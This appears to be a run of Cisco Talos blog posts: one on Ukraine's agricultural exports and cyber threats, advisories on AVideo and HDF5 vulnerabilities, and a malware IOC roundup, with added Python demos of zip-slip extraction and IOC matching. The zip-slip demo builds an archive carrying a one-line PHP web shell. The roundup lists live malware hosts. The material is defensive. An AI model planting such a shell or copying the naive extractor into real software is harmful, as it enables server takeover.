It is something of an understatement to say that Ukrainian agricultural exports are in dire straits. Currently, due to the invasion, Ukraine has limited access to seaports to export its extensive backlog of wheat and other agricultural products. Pre-war, 70% of agricultural exports moved through seaports, averaging 25 million metric tons a year. This has been reduced to a trickle: only 2 million tons were exported in June, a far cry from the 4 million that is typical for that time of year. Poor countries that cannot shoulder the steep increase in prices will suffer the most. Forty percent of Ukraine's wheat exports go directly to the U.N. World Food Programme, which helps feed these poorer countries.

Further complicating matters is the act of planting and harvesting in Ukraine itself. Some fields are now littered with mines and unexploded ordnance, and farm labor is difficult to find. These factors create delays that can be catastrophic to a farm's ability to keep providing food to the world. For example, every day of delay during planting season can reduce the total bushel-per-acre yield, before even taking into consideration weather, market conditions and, of course, armed conflict.

There is also a lack of grain storage capacity for current harvests: last year's grain is trapped in silos, and logistics for exporting by any means other than bulk oceanic freight are very poor. Without the ability to ship last year's harvest and this year's harvest now being reaped, planting for the 2023 harvest is in serious jeopardy. All of these complications mean Ukraine will have a vastly and painfully reduced presence in the agriculture market for years to come.

Ukraine and Russia recently signed a U.N.-brokered deal that allows grain exports to resume via the Odessa seaport. This is a much-needed means to deliver grain trapped in Ukraine, but the agreement is on very precarious footing. Russia is still actively bombing and targeting the Odessa metropolis, and has demonstrated time and again that it is willing to abandon agreements when it suits them. The agreement also runs somewhat counter to the Russian tactic of weaponizing the food supply chain to its advantage. By artificially creating scarcity, Russia can leverage concessions from a global community that relies deeply on Ukrainian grain exports to feed the world. Easing that scarcity would remove one of the few cards Russia can play to compel global compliance with its demands. Starvation and scarcity as a means of control is something the Ukrainian people are all too familiar with.

No easy answers  

Ukraine is looking for additional ways to export its trapped agricultural products without relying on the pseudo-availability of the Odessa seaport. As of this writing, it is very laboriously exporting via rail to other Eastern European countries, or via the Danube River to other countries' seaports. The Bessarabia region, in the Odessa Oblast, has two prominent river ports: Izmail and Reni. These ports, however, are quite old and were not built to ingest and export agriculture at peacetime volumes. Even seaports reached via river barge, like Constanta in Romania, offer only a small percentage of peacetime oceanic volume.

Even the Ukrainian rail system is problematic for shipping agricultural products. Ukraine's older Soviet-era railroad tracks are incompatible with those of countries like Poland, so trains cannot simply roll on to the rest of Europe without considerable effort. To put it all succinctly: There are only bad answers to the terrible questions of how to export agriculture in the middle of a Russian invasion.


So what are the security threat models to agriculture? 

Industry-specific instability is enticing to attackers, as victims are seen as more likely to pay an extortion fee in exchange for the return of their data and network. The more unstable and exposed the industry, the more compelling it is to an attacker. Nation states may also see agricultural instability as an opportunistic way to project power and advance national interests.

Critical infrastructure, like agriculture, is part of a complex and interwoven network of critical services that let society function. Cyber attacks on that infrastructure will always carry value to a nation-state advanced persistent threat actor. The ability to disrupt or deny critical services is a potent weapon to enforce one nation's will over another. Even indirect attacks can affect agriculture: cyber-attacks launched against the energy or water sectors can create a ripple effect that impedes the ability of agriculture to produce at optimum. Ukraine has a long history of suffering these kinds of cyber-attacks, including the costly NotPetya attack, which was attributed to Russian APTs.

There are also mutual interests that criminal ransomware cartels and the Russian government share. Ransomware cartels are not shy about their relationships with Russia, and many gangs operate within that country's borders with relative impunity. These groups, which often act as proxies for state-sponsored actors, have financial interests that align with the Russian government's. Russia is kinetically targeting agriculture with the express intent of creating additional food supply chain insecurity; ransomware cartels want to extort victims, and the additional food and supply chain disruptions they cause continue to favor Russian interests.

Much like the Colonial Pipeline ransomware attack, a cyber-attack has unintended consequences that trickle down into how businesses can operate in an industrial environment. As defenders, we must consider our integrations into industrial operations. Agriculture industries are rapid adopters of industrial automation. The imperative to produce rapidly and deliver to market is driving companies to remove the human element where possible. For example, a fully automated grain elevator removes the need for humans to assist in the unloading of grain, extending the serviceable hours an elevator can stay open for farmers. Automated milking systems make it possible to milk cows more frequently, and automated feed pushers keep herds fed so milk production stays consistent. As you think about cyber defense, ask yourself what an attack on your converged farms and facilities would look like. Would the loss of IT assets trickle into the industrial operational technology that lets your business operate? Could you still ship perishable milk? Could a grain elevator still operate?


What does this mean for cyber defenders?  

The invasion of Ukraine is awful. And it is easy to be lost in the suffering and sacrifice of the Ukrainian people. Now is the time, more than ever, to understand what is at stake and what we can do to keep the world fed. Whether we’re protecting a direct agriculture business, or something agricultural-adjacent, now is the time to reflect on business resiliency. As defenders, we cannot control war, the weather, or the agriculture market. Instead, the security community should consider this an opportunity to improve their situational awareness. By just maintaining awareness of outside events, we can draw a better picture of the current security risks. It can be easy to dismiss global events as having no additional effects on an organization’s cybersecurity posture — we’re under constant attack as it is. Instead, consider not the “what,” but the “why” of adversary motivations, and how that can affect potential targets. Understanding that could make all the difference in keeping businesses safe and productive.  


Executive call to action 

For executive leadership, now is an opportune time to evaluate your accepted business risks. That means taking the time to understand how interconnected your agriculture operations are with your corporate offices. Could you function as a business should a ransomware attack affect you? What investments have you made to build resiliency into your operations? These are incredibly difficult questions to answer. Use the catalyst of global events to invest in technology and, more importantly, people, to help you find those answers. Be proactive, and train for high-impact events like a cyber-attack. Utilize third-party services to give unbiased evaluations of your resiliency and recovery. Perhaps most importantly, resist complacency. Cybersecurity threats evolve and shift, as do global events. Maintaining strong situational awareness could be the critical deciding factor between a crippling, costly cyber-attack and a resilient enterprise able to weather any storm. The fate of the world's agricultural supply chain could rely on it.

Vulnerability Spotlight: Vulnerabilities in WWBN AVideo web app could lead to command injection, authentication bypass

16 August 2022 at 15:54



Claudio Bozzato of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered multiple vulnerabilities in the WWBN AVideo web application that could allow an attacker to carry out a wide range of malicious actions, including command injection and authentication bypass. 

AVideo is an open-source web application that allows users to build a video streaming and sharing platform. Anyone who joins the community can host videos on-demand, launch a live stream or encode different video formats. 

TALOS-2022-1542 (CVE-2022-32777 - CVE-2022-32778), TALOS-2022-1549 (CVE-2022-32761) and TALOS-2022-1550 (CVE-2022-28710) are information disclosure vulnerabilities that are triggered if an adversary sends the targeted instance a specially crafted HTTP request. TALOS-2022-1550 and TALOS-2022-1549 could allow the adversary to read arbitrarily selected files on the webserver host, while TALOS-2022-1542 could allow them to steal the session cookie, leading, in the worst case, to takeover of an admin account.

Some of the most serious vulnerabilities discovered in this product are command execution issues. TALOS-2022-1546 (CVE-2022-30534) and TALOS-2022-1548 (CVE-2022-32572) are triggered in a similar way, and both lead to arbitrary command execution via command injection. TALOS-2022-1547 (CVE-2022-30547) is a directory traversal vulnerability that happens while extracting a zip file and eventually leads to arbitrary command execution. 

 That could allow an attacker to gain access to an administrator’s account: 

The app also contains three vulnerabilities that can be used for privilege escalation: TALOS-2022-1534 (CVE-2022-29468), TALOS-2022-1535 (CVE-2022-30605) and TALOS-2022-1545 (CVE-2022-32282). An attacker could exploit TALOS-2022-1545 to log in with only a hashed version of a user's password. TALOS-2022-1534 and TALOS-2022-1535 could be triggered if the attacker can trick the user into making a specially crafted HTTP request. Finally, TALOS-2022-1551 (CVE-2022-33147 - CVE-2022-33149) is a SQL injection vulnerability that can be used to escalate privileges, for example by extracting an admin password hash that can then be used to log in (as explained in TALOS-2022-1545). Cisco Talos worked with WWBN to coordinate disclosure and allow them to patch these vulnerabilities in adherence to Cisco's vulnerability disclosure policy.
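As an added illustration of the archive-extraction traversal class that TALOS-2022-1547 belongs to (this is example code written for this page, not AVideo's code, and it says nothing about how that specific bug is triggered), the following Python compares a naive extractor that trusts archive entry names with one that resolves each target path and refuses any entry that would land outside the upload directory. The archive contents, the entry names and the directory layout are constructed for the demonstration.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one benign entry plus one whose name
    climbs out of the extraction directory (the "zip slip" pattern)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("videos/clip.mp4", b"not really a video")
        # Assumed attacker payload name; zipfile does not sanitize arcnames.
        zf.writestr("../../escape.php", b"<?php system($_GET['c']); ?>")
    return buf.getvalue()


def inside(root: str, path: str) -> bool:
    """True if the resolved path is root itself or lives under it."""
    root = os.path.realpath(root)
    path = os.path.realpath(path)
    return os.path.commonpath([root, path]) == root


def naive_extract(zip_bytes: bytes, dest: str) -> list:
    """Vulnerable pattern: joins the untrusted entry name onto dest and
    writes wherever that lands. Returns the resolved paths written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(zip_bytes: bytes, dest: str):
    """Hardened form: resolve each target and refuse anything that does not
    stay inside dest. Returns (written_paths, rejected_entry_names)."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest, info.filename)
            if os.path.isabs(info.filename) or not inside(dest, target):
                rejected.append(info.filename)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written, rejected


def demo() -> dict:
    """Run both extractors against the constructed archive in a scratch
    tree deep enough that the traversal stays inside the temp directory."""
    payload = build_malicious_zip()
    with tempfile.TemporaryDirectory() as root:
        naive_dest = os.path.join(root, "naive", "www", "uploads")
        safe_dest = os.path.join(root, "safe", "www", "uploads")
        os.makedirs(naive_dest)
        os.makedirs(safe_dest)
        naive_written = naive_extract(payload, naive_dest)
        escaped = [os.path.basename(p) for p in naive_written
                   if not inside(naive_dest, p)]
        safe_written, rejected = safe_extract(payload, safe_dest)
    return {
        "naive_escaped": escaped,            # files written outside uploads/
        "safe_written": [os.path.basename(p) for p in safe_written],
        "safe_rejected": rejected,           # entries the hardened path refused
    }


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path rather than by looking for ".." in the name, so encoded or symlinked variants of the same escape are caught by the same comparison; absolute entry names are rejected explicitly because os.path.join discards dest when the second argument is absolute.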

Talos tested and confirmed the following software is affected by these vulnerabilities: WWBN AVideo, version 11.6 and dev master commit 3f7c0364. 

The following SNORTⓇ rules will detect exploitation attempts against these vulnerabilities: 59993 - 59998, 60003 - 60006, 60071, 60072, 60079, 60080, 60145 - 60153, 60204, 60205 and 60208. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Three vulnerabilities in HDF5 file format could lead to remote code execution

16 August 2022 at 14:03



Dave McDaniel of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered three vulnerabilities in a library that works with the HDF5 file format that could allow an attacker to execute remote code on a targeted device. 

These issues arise in the libhdf5 gif2h5 tool that’s normally used to convert a GIF file to the HDF5 format, commonly used to store large amounts of numerical data. An attacker could exploit these vulnerabilities by tricking a user into opening a specially crafted, malicious file.

TALOS-2022-1485 (CVE-2022-25972) and TALOS-2022-1486 (CVE-2022-25942) are out-of-bounds write vulnerabilities in the gif2h5 tool that trigger a specific crash, opening the door for code execution from the adversary. TALOS-2022-1487 (CVE-2022-26061) works similarly but is a heap-based buffer overflow vulnerability. 

Cisco Talos is disclosing these vulnerabilities despite no official fix from HDF5, in adherence to the 90-day deadline outlined in Cisco's vulnerability disclosure policy.

Talos tested and confirmed that HDF5 Group libhdf5, version 1.10.4, is affected by these vulnerabilities. Users of that version should update as soon as a fix becomes available.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 59296, 59297, 59300, 59301, 59303 and 59304. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Threat Roundup for August 5 to August 12

12 August 2022 at 20:12

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.Tofsee-9960568-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0 | Trojan | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine and has mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1 | Virus | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0 | Dropper | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.Tofsee-9960568-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys | Value Name | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config4 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | - | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | LanguageList | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-103 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-1 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-2 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-4 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-3 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-103 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-103 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config0 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config1 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config2 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config3 | 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV | ErrorControl | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV | DisplayName | 1
Mutexes Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf 1
Global\30977501-13fc-11ed-9660-001517215b93 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]146[.]35[.]35 3
31[.]13[.]65[.]174 3
142[.]251[.]40[.]196 3
96[.]103[.]145[.]165 3
31[.]41[.]244[.]82 3
31[.]41[.]244[.]85 3
80[.]66[.]75[.]254 3
80[.]66[.]75[.]4 3
31[.]41[.]244[.]128 3
31[.]41[.]244[.]126/31 3
208[.]76[.]51[.]51 2
74[.]208[.]5[.]20 2
208[.]76[.]50[.]50 2
202[.]137[.]234[.]30 2
212[.]77[.]101[.]4 2
193[.]222[.]135[.]150 2
203[.]205[.]219[.]57 2
47[.]43[.]18[.]9 2
67[.]231[.]144[.]94 2
188[.]125[.]72[.]74 2
40[.]93[.]207[.]0/31 2
205[.]220[.]176[.]72 2
135[.]148[.]130[.]75 2
121[.]53[.]85[.]11 2
67[.]195[.]204[.]72/30 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 3
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 3
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 3
249[.]5[.]55[.]69[.]in-addr[.]arpa 3
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 3
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 3
microsoft-com[.]mail[.]protection[.]outlook[.]com 3
microsoft[.]com 3
www[.]google[.]com 3
www[.]instagram[.]com 3
comcast[.]net 3
mx1a1[.]comcast[.]net 3
jotunheim[.]name 3
niflheimr[.]cn 3
whois[.]arin[.]net 2
whois[.]iana[.]org 2
mx-eu[.]mail[.]am0[.]yahoodns[.]net 2
aspmx[.]l[.]google[.]com 2
mta5[.]am0[.]yahoodns[.]net 2
icloud[.]com 2
cox[.]net 2
walla[.]com 2
hanmail[.]net 2
allstate[.]com 2
wp[.]pl 2
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 3
%SystemRoot%\SysWOW64\config\systemprofile:.repos 3
%SystemRoot%\SysWOW64\fnwisxtv 1
%SystemRoot%\SysWOW64\airdnsoq 1
%SystemRoot%\SysWOW64\uclxhmik 1
%TEMP%\dnyabinr.exe 1
%TEMP%\lcxykqya.exe 1
%TEMP%\qzguacfj.exe 1
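The IP and domain tables above list indicators in defanged form ([.] in place of dots), sometimes as CIDR ranges (for example 31[.]41[.]244[.]126/31), under the reminder that a contacted host does not by itself indicate maliciousness. The following Python, added here as an example and not part of the roundup or its accompanying JSON, parses a small excerpt of those rows, refangs them, and matches them against constructed DNS and connection log lines, tagging hits on ordinary internet infrastructure separately so they are not read as a compromise on their own. The log lines, their key=value layout and the BENIGN_INFRA list are assumptions made for the demonstration.

```python
import ipaddress
import re

# Constructed excerpts in the roundup's own row format ("defanged value,
# space, occurrence count"). The "*See JSON" line is a table footer, not an
# indicator, and must be skipped. Values are copied from the tables above.
IP_TABLE = """\
216[.]146[.]35[.]35 3
31[.]41[.]244[.]126/31 3
40[.]93[.]207[.]0/31 2
67[.]195[.]204[.]72/30 1
*See JSON for more IOCs
"""

DOMAIN_TABLE = """\
jotunheim[.]name 3
niflheimr[.]cn 3
www[.]google[.]com 3
*See JSON for more IOCs
"""

# Assumed allowlist of hosts the malware touches that are ordinary
# infrastructure; a hit here is context, not evidence of infection.
BENIGN_INFRA = frozenset({"www.google.com", "microsoft.com", "whois.arin.net"})


def refang(value: str) -> str:
    """Reverse the [.] defanging used in the tables."""
    return value.replace("[.]", ".")


def parse_table(text: str) -> list:
    """Return [(refanged_value, occurrences)] for each data row."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("*"):
            continue
        value, count = line.rsplit(" ", 1)
        rows.append((refang(value), int(count)))
    return rows


def ip_networks(rows: list) -> list:
    """CIDR rows become networks; bare addresses become /32 (or /128)."""
    return [ipaddress.ip_network(value, strict=False) for value, _ in rows]


def match_ip(networks: list, ip: str):
    """Return the matching indicator as CIDR text, or None."""
    addr = ipaddress.ip_address(ip)
    return next((str(n) for n in networks if addr in n), None)


def match_domain(domains: list, name: str):
    """Exact or subdomain match against the refanged domain list."""
    name = name.lower().rstrip(".")
    for d in domains:
        if name == d or name.endswith("." + d):
            return d
    return None


# Constructed log lines (not from the page): DNS queries and outbound
# connections in a simple key=value layout.
LOG_LINES = [
    "2022-08-10T12:00:01Z dns  client=10.0.0.5 query=jotunheim.name",
    "2022-08-10T12:00:02Z conn client=10.0.0.5 dst=31.41.244.127:80",
    "2022-08-10T12:00:03Z dns  client=10.0.0.7 query=www.google.com",
    "2022-08-10T12:00:04Z conn client=10.0.0.7 dst=93.184.216.34:443",
    "2022-08-10T12:00:05Z dns  client=10.0.0.9 query=mail.niflheimr.cn",
]

FIELD = re.compile(
    r"client=(?P<client>\S+)\s+(?:query=(?P<query>\S+)|dst=(?P<dst>[^:\s]+))"
)


def scan_logs(lines, ip_table=IP_TABLE, domain_table=DOMAIN_TABLE) -> list:
    """Return (client, indicator, benign_infra) for each line hitting an IOC."""
    networks = ip_networks(parse_table(ip_table))
    domains = [value for value, _ in parse_table(domain_table)]
    hits = []
    for line in lines:
        m = FIELD.search(line)
        if not m:
            continue
        if m.group("query"):
            hit = match_domain(domains, m.group("query"))
        else:
            hit = match_ip(networks, m.group("dst"))
        if hit is not None:
            hits.append((m.group("client"), hit, hit in BENIGN_INFRA))
    return hits


if __name__ == "__main__":
    for client, indicator, benign in scan_logs(LOG_LINES):
        print(client, indicator, "(benign infrastructure)" if benign else "")
```

The /31 and /30 rows are kept as networks rather than expanded, so 31.41.244.127 matches the 31.41.244.126/31 row; the google.com hit is reported but flagged, which is the practical form of the table's "does not indicate maliciousness" caveat.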

File Hashes

098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3
2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957
693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47
a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd
b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959
c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243
d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98
ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d
f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469
f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.TrickBot-9960840-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry Keys | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS | - | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS | 4334c972 | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS | 2d17e659 | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent3 | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent5 | 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent9 | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent6 | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent7 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent2 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent1 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent8 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent0 | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent4 | 2
Mutexes Occurrences
98b59d0b000000cc 36
98b59d0b00000120 36
Global\{2d17e659d34601689591} 36
98b59d0b00000174 36
98b59d0b00000150 36
98b59d0b00000158 36
98b59d0b000001ac 35
98b59d0b00000308 35
98b59d0b0000043c 35
98b59d0b000004b4 35
98b59d0b000001bc 35
98b59d0b000002ec 35
98b59d0b000001f0 35
98b59d0b000001c4 35
98b59d0b0000021c 35
98b59d0b0000025c 35
98b59d0b00000294 35
98b59d0b00000320 35
98b59d0b000003d4 35
98b59d0b000003f8 35
98b59d0b000004dc 35
98b59d0b0000060c 8
98b59d0b000005cc 8
98b59d0b000004f8 8
98b59d0b00000614 7
*See JSON for more IOCs
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
209[.]197[.]3[.]8 11
72[.]21[.]81[.]240 7
69[.]164[.]46[.]0 6
8[.]253[.]154[.]236/31 3
23[.]46[.]150[.]81 2
23[.]46[.]150[.]58 2
8[.]253[.]141[.]249 1
8[.]253[.]38[.]248 1
8[.]253[.]140[.]118 1
23[.]46[.]150[.]43 1
8[.]247[.]119[.]126 1
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
download[.]windowsupdate[.]com 36
adtejoyo1377[.]tk 36
Files and/or directories created Occurrences
%ProgramData%\c7150968.exe 1
%LOCALAPPDATA%\gusEBBF.tmp.bat 1
%ProgramData%\ba886437.exe 1
%HOMEPATH%\jfpDCC6.tmp.bat 1
%ProgramData%\63b007ed.exe 1
%HOMEPATH%\dtaE10F.tmp.bat 1
%ProgramData%\545ba94b.exe 1
%HOMEPATH%\hcv6907.tmp.bat 1
%ProgramData%\7afae1e8.exe 1
%HOMEPATH%\greA7E2.tmp.bat 1
%ProgramData%\9421c9aa.exe 1
%APPDATA%\vqpA923.tmp.bat 1
%ProgramData%\f779fb59.exe 1
%ProgramData%\xywA29.tmp.bat 1
%ProgramData%\940d0a1e.exe 1
%HOMEPATH%\jawD8CB.tmp.bat 1
%ProgramData%\a37667ce.exe 1
%HOMEPATH%\lkyB72F.tmp.bat 1
%ProgramData%\edcfad58.exe 1
%HOMEPATH%\pvf22C5.tmp.bat 1
%ProgramData%\182b8517.exe 1
%LOCALAPPDATA%\qsw15A4.tmp.bat 1
%ProgramData%\a3a20124.exe 1
%HOMEPATH%\xqh15A4.tmp.bat 1
%ProgramData%\a116e074.exe 1
*See JSON for more IOCs

File Hashes

007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12
017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8
024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6
0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d
02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1
03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b
0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86
03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0
04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d
04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42
049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f
